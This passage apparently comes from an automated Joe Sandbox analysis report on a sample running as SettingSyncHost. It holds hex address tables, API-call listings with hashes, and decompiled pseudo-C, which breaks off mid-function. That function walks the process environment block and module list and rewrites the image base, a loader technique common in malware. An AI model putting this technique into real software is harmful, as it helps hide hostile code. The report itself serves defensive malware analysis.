                                                                                                                                      0x0039da59
                                                                                                                                      0x0039da5c
                                                                                                                                      0x0039da5c
                                                                                                                                      0x0039da62
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da62
                                                                                                                                      0x0039da36
                                                                                                                                      0x0039da3a
                                                                                                                                      0x0039da3d
                                                                                                                                      0x0039da3d
                                                                                                                                      0x0039da43
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce33
                                                                                                                                      0x0039ce33
                                                                                                                                      0x0039ce39
                                                                                                                                      0x0039ceb0
                                                                                                                                      0x0039ceb2
                                                                                                                                      0x0039ceb4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ceb4
                                                                                                                                      0x0039ce3b
                                                                                                                                      0x0039ce3e
                                                                                                                                      0x0039ce42
                                                                                                                                      0x0039ce44
                                                                                                                                      0x0039ce59
                                                                                                                                      0x0039ce59
                                                                                                                                      0x0039ce5d
                                                                                                                                      0x0039ce61
                                                                                                                                      0x0039ce63
                                                                                                                                      0x0039ce78
                                                                                                                                      0x0039ce78
                                                                                                                                      0x0039ce7c
                                                                                                                                      0x0039ce80
                                                                                                                                      0x0039ce82
                                                                                                                                      0x0039ce97
                                                                                                                                      0x0039ce97
                                                                                                                                      0x0039ce9b
                                                                                                                                      0x0039ce9f
                                                                                                                                      0x0039cea1
                                                                                                                                      0x0039cea3
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cea1
                                                                                                                                      0x0039ce84
                                                                                                                                      0x0039ce88
                                                                                                                                      0x0039ce8b
                                                                                                                                      0x0039ce8b
                                                                                                                                      0x0039ce91
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce91
                                                                                                                                      0x0039ce65
                                                                                                                                      0x0039ce69
                                                                                                                                      0x0039ce6c
                                                                                                                                      0x0039ce6c
                                                                                                                                      0x0039ce72
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce72
                                                                                                                                      0x0039ce46
                                                                                                                                      0x0039ce4a
                                                                                                                                      0x0039ce4d
                                                                                                                                      0x0039ce4d
                                                                                                                                      0x0039ce53
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d1e1
                                                                                                                                      0x0039d1e1
                                                                                                                                      0x0039d1e7
                                                                                                                                      0x0039d25e
                                                                                                                                      0x0039d260
                                                                                                                                      0x0039d262
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d262
                                                                                                                                      0x0039d1e9
                                                                                                                                      0x0039d1ec
                                                                                                                                      0x0039d1f0
                                                                                                                                      0x0039d1f2
                                                                                                                                      0x0039d207
                                                                                                                                      0x0039d207
                                                                                                                                      0x0039d20b
                                                                                                                                      0x0039d20f
                                                                                                                                      0x0039d211
                                                                                                                                      0x0039d226
                                                                                                                                      0x0039d226
                                                                                                                                      0x0039d22a
                                                                                                                                      0x0039d22e
                                                                                                                                      0x0039d230
                                                                                                                                      0x0039d245
                                                                                                                                      0x0039d245
                                                                                                                                      0x0039d249
                                                                                                                                      0x0039d24d
                                                                                                                                      0x0039d24f
                                                                                                                                      0x0039d251
                                                                                                                                      0x0039d258
                                                                                                                                      0x0039d258
                                                                                                                                      0x0039d258
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d24f
                                                                                                                                      0x0039d232
                                                                                                                                      0x0039d236
                                                                                                                                      0x0039d239
                                                                                                                                      0x0039d239
                                                                                                                                      0x0039d23f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d18c
                                                                                                                                      0x0039d190
                                                                                                                                      0x0039d193
                                                                                                                                      0x0039d193
                                                                                                                                      0x0039d199
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d199
                                                                                                                                      0x0039d16d
                                                                                                                                      0x0039d171
                                                                                                                                      0x0039d174
                                                                                                                                      0x0039d174
                                                                                                                                      0x0039d17a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d52c
                                                                                                                                      0x0039d52c
                                                                                                                                      0x0039d532
                                                                                                                                      0x0039d5a9
                                                                                                                                      0x0039d5ab
                                                                                                                                      0x0039d5ad
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d5ad
                                                                                                                                      0x0039d534
                                                                                                                                      0x0039d537
                                                                                                                                      0x0039d53b
                                                                                                                                      0x0039d53d
                                                                                                                                      0x0039d552
                                                                                                                                      0x0039d552
                                                                                                                                      0x0039d556
                                                                                                                                      0x0039d55a
                                                                                                                                      0x0039d55c
                                                                                                                                      0x0039d571
                                                                                                                                      0x0039d571
                                                                                                                                      0x0039d575
                                                                                                                                      0x0039d579
                                                                                                                                      0x0039d57b
                                                                                                                                      0x0039d590
                                                                                                                                      0x0039d590
                                                                                                                                      0x0039d594
                                                                                                                                      0x0039d598
                                                                                                                                      0x0039d59a
                                                                                                                                      0x0039d59c
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d59a
                                                                                                                                      0x0039d57d
                                                                                                                                      0x0039d581
                                                                                                                                      0x0039d584
                                                                                                                                      0x0039d584
                                                                                                                                      0x0039d58a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d58a
                                                                                                                                      0x0039d55e
                                                                                                                                      0x0039d562
                                                                                                                                      0x0039d565
                                                                                                                                      0x0039d565
                                                                                                                                      0x0039d56b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d56b
                                                                                                                                      0x0039d53f
                                                                                                                                      0x0039d543
                                                                                                                                      0x0039d546
                                                                                                                                      0x0039d546
                                                                                                                                      0x0039d54c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d915
                                                                                                                                      0x0039d915
                                                                                                                                      0x0039d91b
                                                                                                                                      0x0039d992
                                                                                                                                      0x0039d994
                                                                                                                                      0x0039d996
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d996
                                                                                                                                      0x0039d91d
                                                                                                                                      0x0039d920
                                                                                                                                      0x0039d924
                                                                                                                                      0x0039d926
                                                                                                                                      0x0039d93b
                                                                                                                                      0x0039d93b
                                                                                                                                      0x0039d93f
                                                                                                                                      0x0039d943
                                                                                                                                      0x0039d945
                                                                                                                                      0x0039d95a
                                                                                                                                      0x0039d95a
                                                                                                                                      0x0039d95e
                                                                                                                                      0x0039d962
                                                                                                                                      0x0039d964
                                                                                                                                      0x0039d979
                                                                                                                                      0x0039d979
                                                                                                                                      0x0039d97d
                                                                                                                                      0x0039d981
                                                                                                                                      0x0039d983
                                                                                                                                      0x0039d985
                                                                                                                                      0x0039d98c
                                                                                                                                      0x0039d98c
                                                                                                                                      0x0039d98c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d983
                                                                                                                                      0x0039d966
                                                                                                                                      0x0039d96a
                                                                                                                                      0x0039d96d
                                                                                                                                      0x0039d96d
                                                                                                                                      0x0039d973
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d973
                                                                                                                                      0x0039d947
                                                                                                                                      0x0039d94b
                                                                                                                                      0x0039d94e
                                                                                                                                      0x0039d94e
                                                                                                                                      0x0039d954
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d954
                                                                                                                                      0x0039d928
                                                                                                                                      0x0039d92c
                                                                                                                                      0x0039d92f
                                                                                                                                      0x0039d92f
                                                                                                                                      0x0039d935
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd35
                                                                                                                                      0x0039cd3b
                                                                                                                                      0x0039cda6
                                                                                                                                      0x0039cda8
                                                                                                                                      0x0039cdaa
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cdaa
                                                                                                                                      0x0039cd3d
                                                                                                                                      0x0039cd40
                                                                                                                                      0x0039cd44
                                                                                                                                      0x0039cd46
                                                                                                                                      0x0039cd57
                                                                                                                                      0x0039cd57
                                                                                                                                      0x0039cd5b
                                                                                                                                      0x0039cd5f
                                                                                                                                      0x0039cd61
                                                                                                                                      0x0039cd72
                                                                                                                                      0x0039cd72
                                                                                                                                      0x0039cd76
                                                                                                                                      0x0039cd7a
                                                                                                                                      0x0039cd7c
                                                                                                                                      0x0039cd8d
                                                                                                                                      0x0039cd8d
                                                                                                                                      0x0039cd91
                                                                                                                                      0x0039cd95
                                                                                                                                      0x0039cd97
                                                                                                                                      0x0039cd99
                                                                                                                                      0x0039cda0
                                                                                                                                      0x0039cda0
                                                                                                                                      0x0039cda0
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd97
                                                                                                                                      0x0039cd7e
                                                                                                                                      0x0039cd82
                                                                                                                                      0x0039cd85
                                                                                                                                      0x0039cd85
                                                                                                                                      0x0039cd8b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd8b
                                                                                                                                      0x0039cd63
                                                                                                                                      0x0039cd67
                                                                                                                                      0x0039cd6a
                                                                                                                                      0x0039cd6a
                                                                                                                                      0x0039cd70
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: /F9
                                                                                                                                      • API String ID: 0-896972868
                                                                                                                                      • Opcode ID: 727c47f388e5ec40e6bb42996d143e3ee289c64d3bb252a72f2b9da7194b2ef5
                                                                                                                                      • Instruction ID: 393c3647aa30161b08e1e087e7476cee768ab353d1e8e8bee1a7dbdb87d73255
                                                                                                                                      • Opcode Fuzzy Hash: 727c47f388e5ec40e6bb42996d143e3ee289c64d3bb252a72f2b9da7194b2ef5
                                                                                                                                      • Instruction Fuzzy Hash: 1102A233D696B24B8F734EB944D02277FA06E01B9131F96E9DDC43F59AC212ED0696E0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003D978C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                      • Opcode ID: 1d3673e8e3ce46aa024418da8d3dcda6ab5a3868b0d79bdf5ccbfbcee5615879
                                                                                                                                      • Instruction ID: 9c9c2a72d5b83e168778c91f246a31953d7ca53bdfcd0386e47b0b6b87805cc5
                                                                                                                                      • Opcode Fuzzy Hash: 1d3673e8e3ce46aa024418da8d3dcda6ab5a3868b0d79bdf5ccbfbcee5615879
                                                                                                                                      • Instruction Fuzzy Hash: 5851ACB2A01605CBDB1ACF64EA913AEBBF4FB88310F25842BD405EB360D3749E40CB54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c50e80c7b6320d654c8f95c91de14614c7df028d2240debc6172520114fc2e0e
                                                                                                                                      • Instruction ID: 9a8a922522e605d0b8f312a8823efd658156e1b283faeb85985fee85540c3842
                                                                                                                                      • Opcode Fuzzy Hash: c50e80c7b6320d654c8f95c91de14614c7df028d2240debc6172520114fc2e0e
                                                                                                                                      • Instruction Fuzzy Hash: 0041C5B580466CAFDB11DF69CC89AAABBB8EF45300F1442DDE45DD7241DA309E81CF10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5A72
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE3C7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_free$InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2003897158-0
                                                                                                                                      • Opcode ID: 262b81d336c56c40dfed72b0fe639f2875b2d05439569dd4d4ea242443f77f28
                                                                                                                                      • Instruction ID: 26d8b7aad45fa5032dfa1e2b35467a6fa5c43f7541830f3c5397ea788dc2cbad
                                                                                                                                      • Opcode Fuzzy Hash: 262b81d336c56c40dfed72b0fe639f2875b2d05439569dd4d4ea242443f77f28
                                                                                                                                      • Instruction Fuzzy Hash: AB219572611266ABDB2AAB57DC41EBA73ACEF48314F10427AF901DA1C1EB74ED40CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,003EE33C,00000000,00000000,?), ref: 003EE5CB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                      • Opcode ID: fe282ec0bb216f72e9ed4fb3f08a8f4e0f44cfaa40d1f2532987b95fcad34d0a
                                                                                                                                      • Instruction ID: cd37fa1cb01d1c8ea581effbb5b49533a8fccd88eed05948d0968c82e12d1490
                                                                                                                                      • Opcode Fuzzy Hash: fe282ec0bb216f72e9ed4fb3f08a8f4e0f44cfaa40d1f2532987b95fcad34d0a
                                                                                                                                      • Instruction Fuzzy Hash: B0F0A9326001716BDB3A5B26C84ABBB7768EB40759F154525ED06A71C0EB74FD41C690
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003EE373,00000001,00000000,?,-00000050,?,003EE712,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 003EE0DF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                      • Opcode ID: ea202b1270e6d048acb658dc6c5e0d1674b8c5a81d34669d61f684a075264718
                                                                                                                                      • Instruction ID: 37beea2eb8c2000541776e0c6dc38418e360c3fb889227932a5528d3f12744fe
                                                                                                                                      • Opcode Fuzzy Hash: ea202b1270e6d048acb658dc6c5e0d1674b8c5a81d34669d61f684a075264718
                                                                                                                                      • Instruction Fuzzy Hash: FCF046362003545FCB265F3BCC81A7A7B91EF80368F05863CF9064B6D0D6B19C01C740
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E3614: EnterCriticalSection.KERNEL32(?,?,003E0CC4,00000000,00407890,0000000C,003E0C8B,?,?,003E5C95,?,?,003E5BB2,00000001,00000364,00000006), ref: 003E3623
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003E8AEC,00000001,00407B30,0000000C,003E8F17,00000000), ref: 003E8B31
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                      • Opcode ID: 16b52fce1be11df105865fbec2313fd21c72f31d8d740d16533937d64c14a235
                                                                                                                                      • Instruction ID: 1ab41cda7dfff90981fb2710c9e5ab7e28665a9df36dd21b51b12c3348b71cd3
                                                                                                                                      • Opcode Fuzzy Hash: 16b52fce1be11df105865fbec2313fd21c72f31d8d740d16533937d64c14a235
                                                                                                                                      • Instruction Fuzzy Hash: 3FF03772A10354DFDB01EFA9E942B9D7BB0EB08721F10462AE414AB2E0CB756940CB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003EDF08,00000001,00000000,?,?,003EE770,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 003EDFE6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,003E3125,?,20001004,00000000,00000002,?,?,003E2732), ref: 003E904F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • EnumSystemLocalesA.KERNEL32(Function_0000AD33), ref: 0039B0E1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E003B024E() {
                                                                                                                                      
                                                                                                                                      				SetUnhandledExceptionFilter(E003B020C);
                                                                                                                                      				return 0;
                                                                                                                                      			}



                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002020C), ref: 003B0253
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0
                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 17%
                                                                                                                                      			E00391FE0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
                                                                                                                                      				intOrPtr _v12;
                                                                                                                                      				intOrPtr* _v24;
                                                                                                                                      				intOrPtr _v36;
                                                                                                                                      				intOrPtr _v48;
                                                                                                                                      				intOrPtr _v60;
                                                                                                                                      				void _v256;
                                                                                                                                      				intOrPtr _t102;
                                                                                                                                      				intOrPtr _t107;
                                                                                                                                      				void* _t110;
                                                                                                                                      				void* _t119;
                                                                                                                                      				void* _t120;
                                                                                                                                      				long long* _t122;
                                                                                                                                      				void* _t123;
                                                                                                                                      				long long* _t124;
                                                                                                                                      				long long* _t126;
                                                                                                                                      				void* _t127;
                                                                                                                                      				long long* _t129;
                                                                                                                                      				long long* _t130;
                                                                                                                                      				long long* _t132;
                                                                                                                                      				long long* _t134;
                                                                                                                                      				long long* _t136;
                                                                                                                                      				long long _t140;
                                                                                                                                      				long long _t141;
                                                                                                                                      				long long _t142;
                                                                                                                                      				long long _t143;
                                                                                                                                      				long long _t144;
                                                                                                                                      				long long _t145;
                                                                                                                                      				long long _t146;
                                                                                                                                      				long long _t147;
                                                                                                                                      
                                                                                                                                      				_t110 = __edx;
                                                                                                                                      				memset( &_v256, 0xcccccccc, 0x3f << 2);
                                                                                                                                      				_v36 =  *[fs:0x30];
                                                                                                                                      				_t6 = _a4 + 0x3c; // 0x100
                                                                                                                                      				_v48 = _a4 +  *_t6;
                                                                                                                                      				_t122 = _t120 + 0xc - 8;
                                                                                                                                      				_t140 =  *0x3bbc50;
                                                                                                                                      				 *_t122 = _t140;
                                                                                                                                      				E00393700(_t110);
                                                                                                                                      				 *_t122 = _t140;
                                                                                                                                      				E003935B0(_t110);
                                                                                                                                      				 *_t122 = _t140;
                                                                                                                                      				E00393460(_t110);
                                                                                                                                      				 *_t122 = _t140;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t140;
                                                                                                                                      				_t123 = _t122 + 8;
                                                                                                                                      				_t9 = _a4 + 0x3c; // 0x100
                                                                                                                                      				_t10 =  &_a8; // 0x392e0a
                                                                                                                                      				_t111 =  *_t10;
                                                                                                                                      				if(( *( *_t10 +  *_t9 + 0x16) & 0x2000) == 0) {
                                                                                                                                      					 *((intOrPtr*)(_v36 + 8)) = _a4;
                                                                                                                                      				}
                                                                                                                                      				_t124 = _t123 - 8;
                                                                                                                                      				_t141 =  *0x3bbc50;
                                                                                                                                      				 *_t124 = _t141;
                                                                                                                                      				E00393700(_t111);
                                                                                                                                      				 *_t124 = _t141;
                                                                                                                                      				E003935B0(_t111);
                                                                                                                                      				 *_t124 = _t141;
                                                                                                                                      				E00393460(_t111);
                                                                                                                                      				 *_t124 = _t141;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t141;
                                                                                                                                      				_v12 =  *((intOrPtr*)(_v36 + 0xc)) + 0x14;
                                                                                                                                      				_t126 = _t124 + 8 - 8;
                                                                                                                                      				_t142 =  *0x3bbc50;
                                                                                                                                      				 *_t126 = _t142;
                                                                                                                                      				E00393700(_t111);
                                                                                                                                      				 *_t126 = _t142;
                                                                                                                                      				E003935B0(_t111);
                                                                                                                                      				 *_t126 = _t142;
                                                                                                                                      				E00393460(_t111);
                                                                                                                                      				 *_t126 = _t142;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t142;
                                                                                                                                      				_t127 = _t126 + 8;
                                                                                                                                      				_t102 =  *((intOrPtr*)(_v36 + 0xc));
                                                                                                                                      				_t112 =  *((intOrPtr*)(_t102 + 0x14));
                                                                                                                                      				_v24 =  *((intOrPtr*)(_t102 + 0x14));
                                                                                                                                      				while(1) {
                                                                                                                                      					_t65 = _v24;
                                                                                                                                      					if(_v24 == _v12) {
                                                                                                                                      						break;
                                                                                                                                      					}
                                                                                                                                      					_v60 = _v24 - 8;
                                                                                                                                      					_t129 = _t127 - 8;
                                                                                                                                      					_t143 =  *0x3bbc50;
                                                                                                                                      					 *_t129 = _t143;
                                                                                                                                      					E00393700(_t112);
                                                                                                                                      					 *_t129 = _t143;
                                                                                                                                      					E003935B0(_t112);
                                                                                                                                      					 *_t129 = _t143;
                                                                                                                                      					E00393460(_t112);
                                                                                                                                      					 *_t129 = _t143;
                                                                                                                                      					E00393340();
                                                                                                                                      					st0 = _t143;
                                                                                                                                      					_t127 = _t129 + 8;
